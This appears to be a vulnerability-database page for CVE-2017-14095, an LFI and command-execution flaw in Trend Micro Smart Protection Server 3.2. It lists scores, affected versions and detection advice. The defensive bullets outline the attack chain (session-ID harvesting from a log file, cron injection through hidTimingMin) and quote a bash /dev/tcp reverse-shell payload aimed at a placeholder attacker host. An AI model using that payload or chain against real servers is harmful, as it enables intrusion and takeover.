CVE-2017-14095
published 2018-01-19CVE-2017-14095: A vulnerability in Trend Micro Smart Protection Server (Standalone) versions 3.2 and below could allow an attacker to perform remote command execution via a…
PriorityP262high8.1CVSS 3.0
AVNACHPRNUINSUCHIHAH
EXPLOIT
EPSS
12.48%
95.7th percentile
A vulnerability in Trend Micro Smart Protection Server (Standalone) versions 3.2 and below could allow an attacker to perform remote command execution via a local file inclusion on a vulnerable system.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| trend_micro | trend_micro_smart_protection_server | — | — |
| trendmicro | smart_protection_server | <= 3.2 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor unauthenticated HTTP GET requests to /widget/repository/log/diagnostic.log — attackers use this to harvest active session IDs without credentials. ↗
- →Detect POST requests to /php/admin_update_program.php where the hidTimingMin parameter contains cron-injection patterns (e.g., multiple asterisks followed by a shell command and a '#' comment terminator). ↗
- →Alert on modifications to /var/spool/cron/webserv, especially entries injected via the web application process (webserv user), as this is the cron file written by the vulnerable admin_update_program.php script. ↗
- →Detect HTTP requests to /widget/inc/widget_package_manager.php with user-supplied path traversal or LFI payloads in parameters; the script appends 'PoolManager.php' to user input passed to require_once. ↗
- →Look for the string 'MSG_UPDATE_UPDATE_SCHEDULE' in HTTP responses to POST requests targeting admin_update_program.php — its presence confirms successful cron job injection by the exploit. ↗
- →Detect outbound reverse shell connections from the web server process (webserv) to external IPs over arbitrary high ports, consistent with 'bash -i >& /dev/tcp/<attacker>/<port> 0>&1' payloads. ↗
- ·The LFI vulnerability (CVE-2017-14095) in widget_package_manager.php has a restriction: the application appends 'PoolManager.php' to the attacker-supplied filename, which must be accounted for in any exploit or detection signature. ↗
- ·The cron injection and session hijacking exploits chain together — the attacker first harvests a session token from the unauthenticated log endpoint, then uses it to authenticate the POST to admin_update_program.php. Detection must account for this two-step chain. ↗
- ·Affected version confirmed in testing is Trend Micro Smart Protection Server 3.2 (Build 1085); other versions may also be affected but were not tested. ↗
CVSS provenance
nvdv3.08.1HIGHCVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://www.securityfocus.com/bid/102275https://success.trendmicro.com/solution/1118992https://www.coresecurity.com/advisories/trend-micro-smart-protection-server-multiple-vulnerabilitieshttps://www.exploit-db.com/exploits/43388/http://www.securityfocus.com/bid/102275https://success.trendmicro.com/solution/1118992https://www.coresecurity.com/advisories/trend-micro-smart-protection-server-multiple-vulnerabilitieshttps://www.exploit-db.com/exploits/43388/
2018-01-19
Published